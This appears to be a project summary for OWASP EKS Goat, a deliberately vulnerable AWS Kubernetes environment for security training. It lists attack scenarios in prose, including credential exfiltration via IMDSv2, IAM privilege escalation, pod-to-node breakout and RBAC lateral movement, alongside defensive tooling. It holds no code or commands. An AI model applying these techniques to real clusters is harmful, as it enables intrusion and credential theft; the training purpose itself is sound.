From https://github.com/OWASP/www-project-eks-goat
OWASP EKS Goat is an intentionally vulnerable EKS cluster environment designed for hands-on security testing and learning in AWS cloud-native environments. It is an official OWASP project.
Key Features:
- Real-World Attack Scenarios β Exploit vulnerable Jenkins apps in EKS, compromise ECR containers, exfiltrate credentials via IMDSv2, escalate privileges through misconfigured IAM roles, break out from pod to EC2 node, and abuse RBAC for lateral movement
- Defense & Hardening β Kubescape and Kubebench for compliance assessment, runtime defense via Falco and Tetragon, AWS GuardDuty alerts for EKS threats
- Hands-On Labs β Full walkthrough covering container & image security, AWS ECR exploitation, AWS EKS exploitation, scanning & auditing, and environment lifecycle management
